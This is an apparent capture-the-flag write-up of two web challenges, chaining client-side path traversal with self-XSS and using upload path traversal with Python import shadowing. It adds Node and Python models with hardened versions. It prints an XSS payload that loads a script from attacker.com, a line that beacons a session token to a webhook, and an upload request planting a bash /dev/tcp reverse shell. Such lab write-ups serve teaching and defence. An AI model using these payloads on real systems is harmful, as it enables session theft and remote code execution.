Bubble: ReRevenge
Vulnerability
- Client Side Path Traversal
`e` and `t` are controlled by path parameters.
As the screenshot above shows, the path of the API request can be manipulated with path traversal (client-side path traversal, CSPT).
- Self XSS
When writing a post, a self-XSS occurs in the preview function: the `@[youtube ...]` embed accepts a srcdoc attribute, and the resulting iframe renders attacker-supplied HTML.
Chaining
The admin bot works as follows:
- Register
- Add a post containing the flag
- Visit the reported post
- Write a comment containing the visited post's author name
- Go back to the dashboard and write a new post
In step 4 the client-side path traversal fires as well: because the post id in the reported URL contains the traversal, the comment request is sent to /api/drafts/save instead of the comment endpoint.
So the comment, which contains the author name of our post (our username), is stored as the admin's draft.
If our username contains an XSS payload, it executes in step 5 when the admin bot opens the new-post editor and the draft is rendered by the vulnerable preview.
Payload
- Change the username to the payload below. The preview renders the `@[youtube ...]` embed as an iframe, and the injected srcdoc attribute makes that iframe load af.js from the attacker host. The srcdoc iframe is not sandboxed, so the script runs same-origin with the app and can read its localStorage.
af.js (hosted on attacker.com):
navigator.sendBeacon("https://webhook",localStorage.getItem("DiarrheaTokenBearerInLocalStorageForSecureRequestsContactAdminHeKnowsHotToUseWeHaveManyTokensHereSoThisOneShouldBeUnique"))
Username:
@[youtube srcdoc=<script/src=//attacker.com/af.js></script>]
- Report URL:
https://bubble-tea-rerevenge.task.sasc.tf/post/USER_UUID/posts/506%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2fapi%2fdrafts%2fsave%23
The post-id segment decodes to `506/.<TAB>./.<TAB>./.../api/drafts/save#`. The slashes are encoded as %2f so the SPA router treats the whole thing as one parameter. When the frontend interpolates it into the API path and calls fetch, the browser's URL parser strips the ASCII tab from each `.<TAB>.`, turning it into `..`, so a `..` filter applied to the raw parameter never sees it; the trailing `#` turns whatever the frontend appends after the post id into a fragment, and the request lands on /api/drafts/save.
- Get the flag using the admin's session token that was exfiltrated to the webhook.
FLAG : kaspersky{6ruh_6um6l3_1s_n0_m0r3}
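As an added example (not part of the original writeup and not the challenge's frontend code), the Node script below models how the route parameter reaches the API URL and why the reported URL ends up at /api/drafts/save. The request path pattern `/api/users/${e}/posts/${t}/comments`, the function names and the origin are assumptions; Node's URL class implements the same WHATWG parser browsers use for fetch(), including tab stripping and `..` collapsing.

```javascript
// Added example: models client-side path traversal through a route parameter.
// The API path pattern below is an assumption; the real bundle's code is not on the page.
const ORIGIN = "https://bubble-tea-rerevenge.task.sasc.tf";

// Assumed frontend request builder: e (user uuid) and t (post id) come straight
// from the route parameters and are interpolated without encoding.
function buildApiUrl(e, t) {
  return `/api/users/${e}/posts/${t}/comments`;
}

// What the browser actually requests: the WHATWG parser removes ASCII tab/newline,
// resolves "..", and cuts the string at "#".
function resolvedPath(e, t) {
  return new URL(buildApiUrl(e, t), ORIGIN).pathname;
}

// Hardened builder: percent-encoding the parameter keeps "/" and "#" literal
// and keeps the tab as %09, which the parser does not strip.
function buildApiUrlEncoded(e, t) {
  return `/api/users/${encodeURIComponent(e)}/posts/${encodeURIComponent(t)}/comments`;
}
function resolvedPathEncoded(e, t) {
  return new URL(buildApiUrlEncoded(e, t), ORIGIN).pathname;
}

// The post-id segment from the reported URL, as the SPA router decodes it.
const REPORT_PARAM =
  "506%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2fapi%2fdrafts%2fsave%23";
const decodedParam = decodeURIComponent(REPORT_PARAM); // "506/.\t./.\t./.../api/drafts/save#"

// A filter that looks for ".." in the raw parameter is bypassed: each "../" is ".\t./".
function naiveTraversalFilter(segment) {
  return !segment.includes("..");
}

// A sound check validates the parameter against its expected shape before use.
function safePostId(t) {
  return /^\d+$/.test(t);
}

// usage
console.log(resolvedPath("USER_UUID", "506"));        // /api/users/USER_UUID/posts/506/comments
console.log(resolvedPath("USER_UUID", decodedParam)); // /api/drafts/save
console.log(naiveTraversalFilter(decodedParam));      // true  (filter bypassed)
console.log(safePostId(decodedParam));                // false
console.log(resolvedPathEncoded("USER_UUID", decodedParam)); // stays under /api/users/USER_UUID/posts/
```

The seven `..` segments in the report URL are more than the assumed path needs; extra `..` at the root are ignored by the parser, so the payload does not depend on knowing the exact depth of the real API path.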
Peach Investor
Vulnerability
- File upload vulnerability
Any file can be uploaded without restriction.
There is also no validation of the source parameter, so directory traversal lets us write the file to any location.
Exploit
In the Docker container, I saw that the Celery scheduler imports a strange module (billiard).
We can use this to get a shell.
If we create a directory called billiard next to the upload directory and upload an __init__.py containing a reverse shell into it, our code runs when the scheduler starts and imports billiard.
This works because Python resolves imports in sys.path order and the application directory comes before site-packages, so the uploaded package shadows the installed one.
Payload
POST /upload?source=../billiard HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en,ko;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 269
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Host: 409fe342-33f9-4f27-b317-398f174974ee.kit.sasc.tf
Origin: http://localhost:8000
Pragma: no-cache
Referer: http://localhost:8000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Content-Disposition: form-data; name="file"; filename="__init__.py"
Content-Type: application/json

import os
os.system("/bin/bash -c 'bash -i > /dev/tcp/IP/1234 0>&1'")
------WebKitFormBoundaryBB3U3Fw3boGnqJKQ--
FLAG: kaspersky{p41d_w17h_c4sh_4nd_3nd3d_up_s0_s35h}
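Added example, not the challenge's own code: a minimal model of the upload handler the writeup describes (the source parameter is joined onto the upload directory with no validation), the import-shadowing effect that turns a written `billiard/__init__.py` into code execution, and a hardened version of the save routine. The function names, the `uploads/` layout, the extension allowlist and the `IMPORT_MARKER` stand-in for the reverse shell are assumptions made for the demonstration; everything runs inside a temporary directory.

```python
"""Added example (not the challenge's code): upload path traversal + import shadowing."""
import importlib
import os
import sys
import tempfile


def save_upload_vulnerable(upload_dir, source, filename, data):
    """Models the vulnerable handler: `source` and `filename` are trusted as-is."""
    dest_dir = os.path.join(upload_dir, source)  # "../billiard" escapes upload_dir
    os.makedirs(dest_dir, exist_ok=True)
    path = os.path.join(dest_dir, filename)
    with open(path, "wb") as fh:
        fh.write(data)
    return os.path.realpath(path)


def save_upload_hardened(upload_dir, source, filename, data,
                         allowed_ext=(".png", ".jpg", ".pdf")):
    """Resolve the final path and refuse anything that leaves the upload root."""
    root = os.path.realpath(upload_dir)
    name = os.path.basename(filename)  # drop any directory part of the client name
    if not name.lower().endswith(allowed_ext):
        raise ValueError("file type not allowed")
    dest = os.path.realpath(os.path.join(root, source, name))
    if os.path.commonpath([root, dest]) != root:  # realpath also defuses symlinks
        raise ValueError("path traversal rejected")
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def import_from_app_dir(app_dir, module_name):
    """Import `module_name` as a process started in `app_dir` would: that directory
    sits at sys.path[0], ahead of site-packages, so a package there wins."""
    sys.path.insert(0, app_dir)
    sys.modules.pop(module_name, None)
    importlib.invalidate_caches()
    try:
        return getattr(importlib.import_module(module_name), "IMPORT_MARKER", None)
    finally:
        sys.path.remove(app_dir)
        sys.modules.pop(module_name, None)


def run_demo(module_name="billiard"):
    """Run the whole scenario in a scratch directory and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        app_dir = os.path.realpath(tmp)
        upload_dir = os.path.join(app_dir, "uploads")
        os.makedirs(upload_dir)
        # Stand-in for the reverse-shell __init__.py: it only leaves a marker.
        payload = b"IMPORT_MARKER = 'shadowed'\n"
        written = save_upload_vulnerable(upload_dir, "../" + module_name,
                                         "__init__.py", payload)
        ok = save_upload_hardened(upload_dir, "images", "pic.png", b"\x89PNG")
        try:
            save_upload_hardened(upload_dir, "../" + module_name, "pic.png", payload)
            blocked = False
        except ValueError:
            blocked = True
        return {
            "written": os.path.relpath(written, app_dir),
            "escaped_upload_dir": os.path.commonpath([upload_dir, written]) != upload_dir,
            "marker": import_from_app_dir(app_dir, module_name),
            "hardened_ok": os.path.relpath(ok, app_dir),
            "hardened_blocked": blocked,
        }


if __name__ == "__main__":
    print(run_demo())
```

The `marker` result shows the shadowing directly: even if a real billiard is installed, the package written next to the upload directory is the one Python imports, which is why an `__init__.py` with a reverse shell fires as soon as the scheduler starts.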